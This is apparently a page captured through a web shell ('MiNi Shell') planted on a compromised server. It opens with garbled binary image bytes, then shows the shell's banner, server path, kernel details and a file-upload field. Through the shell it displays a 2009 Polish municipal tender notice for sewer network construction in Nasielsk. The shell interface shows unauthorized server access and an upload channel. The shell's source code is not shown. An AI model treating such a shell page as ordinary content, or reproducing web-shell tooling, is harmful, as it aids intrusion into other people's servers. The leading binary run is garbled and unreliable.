JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090408/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090408/96504-N-2009.html

<p class="kh_header"><b>Nasielsk: Budowa sieci kanalizacji sanitarnej z przykanalikami w miejscowościch Stare i Nowe Pieścirogi, gmina Nasielsk</b><br>
<b>Numer ogłoszenia: 96504 - 2009; data zamieszczenia: 08.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Nasielsk , ul. Elektronowa 3, 05-190 Nasielsk, woj. mazowieckie, tel. 023 6933000, faks 023 6912470.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.nasielsk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa sieci kanalizacji sanitarnej z przykanalikami w miejscowościch Stare i Nowe Pieścirogi, gmina Nasielsk.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie kanalizacji sanitarnej grawitacyjnej i tłocznej, 7 przepompowni oraz przykanalików wg projektu technicznego w miejscowościach Stare Pieścirogi, Nowe Pieścirogi, Morgi, Kosewo i Nasielsk. 
Przedmiot zamówienia obejmuje:
a) Budowę sieci kanalizacji grawitacyjnej z rur PVC - U 200 z wydłużonym kielichem typu S długości łącznej ok. 15280 mb 
b) Budowę sieci kanalizacji tłocznej, która obejmuje:
- przewody tłoczne z rur PE 160/9,5 (Dy*e) SDR 17 - ok. 980,0 mb
- przewody tłoczne z rur PE 125/7,4 (Dy*e) SDR 17 - ok. 736,0 mb
- przewody tłoczne z rur PE 110/6,6 (Dy*e) SDR 17 - ok. 280,0 mb
- przewody tłoczne z rur PE   90/5,4 (Dy*e) SDR 17 - ok. 618,0 mb
c) Przykanaliki z rur PVC - U 160 długości ok. 3390 m, ok. 630 szt.  
d) Budowę 7 przepompowni ścieków zamontowanych w studniach z polimerobetonu o średnicy 1200, 1500 mm z pompami zatapialnymi - szczegóły techniczne dla każdej pompowni zostały przedstawione w dokumentacji projektowej oraz Specyfikacji Technicznej - Kanalizacja Sanitarna Grawitacyjna i Ciśnieniowa. 
e) Odwodnienie
f) Ogrodzenie przepompowni
g) Roboty elektryczne.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.13.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający wymaga wpłaty wadium w kwocie: 100.000,00 zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Oferenci spełniający niżej podane warunki:
1 Muszą mieć prawo do występowania w obrocie prawnym w zakresie objętym zamówieniem;
2 Nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych;
3 Muszą spełniać warunki określone przepisami art. 22 ust. 1 w/w ustawy.
4 Muszą udowodnić, że dysponują środkami finansowymi zapewniającymi wykonanie zadania.
5 Muszą posiadać niezbędną wiedzę i doświadczenie oraz dysponować potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
- kierownik budowy - stwierdzenie przygotowania do wykonywania samodzielnych funkcji kierownika budowy i robót w zakresie sanitarnym oraz dokument potwierdzający przynależność do Okręgowej Izby Inżynierów Budownictwa;
6 Muszą posiadać doświadczenie i przygotowanie fachowe - zrealizować w ciągu ostatnich 5 lat min 3 zadania o charakterze i złożoności porównywalnej z zakresem przedmiotu zamówienia potwierdzone referencjami od Zamawiających.
7 Muszą dysponować niezbędnym dla realizacji zamówienia sprzętem (własnym lub dzierżawionym).
8 Udzielą na wykonane roboty gwarancji, co najmniej na 36 miesięcy.

Ocena spełnienia wyżej opisanych warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty określone w pkt. 6 niniejszej specyfikacji -Informacje o oświadczeniach i dokumentach, metodą warunku granicznego - spełnia/nie spełnia.
Z postępowania o udzielenie zamówienia wyklucza się Wykonawców niespełniających wymagań określonych przepisami art. 24 ust. 1 i 2 prawa zamówień publicznych.
Oferta wykonawcy wykluczonego uznana zostanie za odrzuconą.
Zamawiający odrzuci ofertę jeżeli:
- oferta będzie niezgodna z ustawą;
- jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia, z zastrzeżeniem art. 87 ust. 2 pkt. 3
- jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji;
- zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia;
- została złożona przez wykonawcę wykluczonego z udziału w postępowaniu o udzielenie zamówienia;
- zawiera błędy w obliczeniu ceny;
- wykonawca w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt. 3;
-jest nieważna na podstawie odrębnych przepisów.
O wykluczeniu z postępowania oraz o odrzuceniu oferty Wykonawcy zostaną zawiadomieni niezwłocznie po dokonaniu wyboru najkorzystniejszej oferty. Zawiadomienie zawierać będzie uzasadnienie faktyczne i prawne odrzucenia oferty..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oferent dołączy do oferty następujące dokumenty poświadczające oraz informacje:
1. Aktualny dokument dopuszczający do obrotu prawnego w zakresie objętym zamówieniem (odpis z właściwego rejestru lub zaświadczenia o wpisie do ewidencji działalności gospodarczej) wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2. Oświadczenie, że Oferent nie podlega wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych i spełnia warunki określone przepisami art. 22 ust. 1 w/w ustawy (przykładowe oświadczenie stanowi załącznik nr 1 do formularza oferty) wraz z aktualnymi zaświadczeniami:
a) Zaświadczeniem z właściwego Urzędu Skarbowego o nie zaleganiu z podatkami (ważne na dzień upływu terminu składania ofert, a w przypadku braku wskazania terminu ważności, datowane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert).
b) Zaświadczeniem z ZUS-u o nie zleganiu ze składkami na ubezpieczenie społeczne lub zdrowotne (ważne na dzień upływu terminu składania ofert, a w przypadku braku wskazania terminu ważności, datowane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert).
Uwaga: w punktach a) i b) Oferent może przedłożyć zaświadczenie, że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.
3. Informacja na temat przeciętnej liczby zatrudnionych pracowników oraz liczebności personelu kierowniczego w okresie ostatnich 3 lat, a w przypadku gdy okres działalności jest krótszy - w tym czasie, oraz informacja dotyczącą  personelu odpowiedzialnego za realizację zamówienia z udokumentowaniem jego kwalifikacji (kopie uprawnień osób przewidzianych do kierowania robotami i dokumentu potwierdzającego przynależność do Izby Inżynierów Budownictwa) na załączniku nr 2 do formularza oferty. W przypadku zaangażowania osób nie będących pracownikami Oferenta należy załączyć ich oświadczenia o gotowości do współpracy przy realizacji zamówienia. 
4. Informację o podwykonawcach, zgodnie z punktem 5 SIWZ (jeżeli nie dotyczy wpisać nie dotyczy)- załącznik nr 3.
5. Wykaz niezbędnych maszyn, urządzeń i sprzętu, jakimi dysponuje Wykonawca i które zamierza wykorzystać do realizacji zamówienia, zgodnie z załącznikiem nr 4 do SIWZ. Należy podać następujące dane: rodzaj sprzętu, rok produkcji, parametry techniczne, ilość sztuk, stan własności, tj. własny czy wynajmowany/dzierżawiony) 
W przypadku składania oferty przez Wykonawców występujących wspólnie o udzielenie zamówienia, ww. warunek Wykonawcy mogą spełniać łącznie.
6 Dane o doświadczeniu Oferenta w zakresie realizacji robót budowlanych w ciągu ostatnich 5 lat, min. 3 zadania w charakterze głównego wykonawcy o wartości powyżej 5 000 000,00 złotych (brutto) każde, w tym co najmniej jedna z przepompownią o podobnej rzeczywistej wydajności, na formularzu stanowiącym załącznik nr 5 do formularza oferty wraz z referencjami od poprzednich Zamawiających. 
7. Aktualna informacja z Krajowego Rejestru Karnego albo równoważne zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art.24 ustawy Prawo Zamówień Publicznych, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
8. Ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę co najmniej 1 000.000,00 zł.
9. Informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada podstawowy rachunek bankowy, potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, na kwotę minimalną 2 000 000,00 zł niezbędną do rozpoczęcia realizacji przedmiotu zamówienia, wystawiona nie wcześniej niż 3 miesiące przed terminem składnia ofert.
10. Dowód wpłacenia (wniesienia) wadium.
11. Wypełniony formularz kosztorysu ofertowego z cenami jednostkowymi oraz wartością zamówienia stanowiącą ofertę.
12. Zaakceptowany wzór umowy, stanowiący załącznik nr 6 do formularza oferty
13. Do ofert składanych przez dwa lub więcej podmioty gospodarcze mają zastosowanie przepisy art. 23 Ustawy Prawo zamówień publicznych.
14. Jeżeli oferent ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów o których mowa powyżej może złożyć dokumenty równoważne opowiadające polskim dokumentom..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 80</li>
<li>2 - Wartość wykonanych robót - 20</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.umnasielsk.bip.org.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Nasielsku, ul. Elektronowa3. 05-190 Nasielsk.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.05.2009 godzina 10:00, miejsce: Urząd Miejski w Nasielsku, ul. Elektronowa3. 05-190 Nasielsk, pokój 109.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com